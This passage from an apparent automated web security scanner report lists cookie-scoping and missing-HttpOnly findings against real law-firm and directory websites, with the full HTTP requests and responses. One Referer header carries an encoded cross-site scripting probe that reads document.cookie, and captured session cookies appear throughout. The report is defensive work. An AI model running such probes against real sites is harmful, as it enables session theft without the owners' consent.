Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

9.30. http://www.fulbright.com/industries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /industries

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /industries HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:50:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.31. http://www.fulbright.com/insite  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /insite

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insite HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.32. http://www.fulbright.com/international  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /international

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /international HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.33. http://www.fulbright.com/jblount  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /jblount

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jblount HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                        <html>
<head>
<title>


                   
...[SNIP]...

9.34. http://www.fulbright.com/news/act_ticker_xml.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /news/act_ticker_xml.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/act_ticker_xml.cfm HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/
Content-Type: text/xml


<images>

       <item>
           <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news>
           <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&amp;article_id=9405&amp;site_id=286<
...[SNIP]...

9.35. http://www.fulbright.com/newsTicker.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /newsTicker.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /newsTicker.swf HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/dc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                <div style="font-family: verdana; text-align: center;">
<img src="http://www.fulbright.com/fjlib/img/logos/fjlogo.jpg"
...[SNIP]...

9.36. http://www.fulbright.com/offices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /offices

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offices HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:51:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.37. http://www.fulbright.com/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /rss

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:52:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.38. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /seminars/act_eventbanner_xml.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seminars/act_eventbanner_xml.cfm HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/
Content-Type: text/xml


<?xml version="1.0" encoding="iso-8859-1"?>
   <events>
   
           
       <event>
           <picture>http://www.fulbright.com/img/banners/seminar/20100119LaborandEmploymentLawUpdate.jpg</picture>
           <url>http://
...[SNIP]...

9.39. http://www.fulbright.com/technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /technology

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.40. http://www.info.com/washington%20dc%20law%20firms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /washington%20dc%20law%20firms HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.221CKMYU; path=/
Date: Wed, 19 Jan 2011 16:44:23 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455463+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:52:19 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54488

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo
...[SNIP]...

9.41. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138085
Date: Wed, 19 Jan 2011 16:52:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=pk4wl545lav5a245t34d1zys; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=5331dc09-813f-4b95-9237-fac957ebffac&expdate=634336159381535318&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:18 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310257381535318; domain=local.com; expires=Wed, 19-Jan-2011 17:22:18 GMT; path=/
Content-Length: 138085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...

9.42. http://www.yellowpages.com/Washington-DC/Attorneys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /Washington-DC/Attorneys

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Washington-DC/Attorneys HTTP/1.1
Host: www.yellowpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 19 Jan 2011 15:13:37 GMT
Status: 301 Moved Permanently
Server: nginx
Content-Type: text/plain
Location: http://www.yellowpages.com/washington-dc/attorneys
Content-Length: 9
X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752
Expires: Wed, 19 Jan 2011 15:13:36 GMT
Cache-Control: no-cache
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
Connection: close

moved to

10. Cookie without HttpOnly flag set  previous  next
There are 237 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://web2.domainmall.com/domainserve/domainView  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domainserve/domainView HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:17 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=70cbf8156fdc673a8d3d0e60aec31ebee4ec02e9; path=/; expires=Wed, 19-Jan-2011 19:15:17 GMT
Content-Length: 44011
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...

10.2. http://wsdsapi.infospace.com/infomaster/widgets  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=PgapVn1EAUuRePVjFvlFYwcvTOazzW42D5eIHH6piUwcdvq_V4SRYlK6ijKxtkcW8OMfUcCaxtJlWL8EdzErEAnKF_LukoLYq0q5jhT6yLmW31wIntrMqxy0narGTb0gkD094FWrtHGfsD0emWtUGf9JJWM2YNnr7chRn25YV24fvG5r0; expires=Fri, 14-Dec-2012 03:31:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qdazgl45ypx3f1qrme5x2145; path=/
Set-Cookie: DomainSession=TransactionId=84ceabcd16f34682b3c0c7deaeb7cb01&SessionId=158b74d0aee4477eab3fc7deaeb7cb01&ActionId=e1845d6a04044c2b87eec7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 17:11:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=0ef466e3216c4abc87c7c7deaeb7cb01&LastSeenDateTime=1/19/2011 4:51:27 PM&IssueDateTime=1/19/2011 4:51:27 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 16:51:27 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 17:51:27 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribu
...[SNIP]...

10.3. http://www.arnoldporter.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
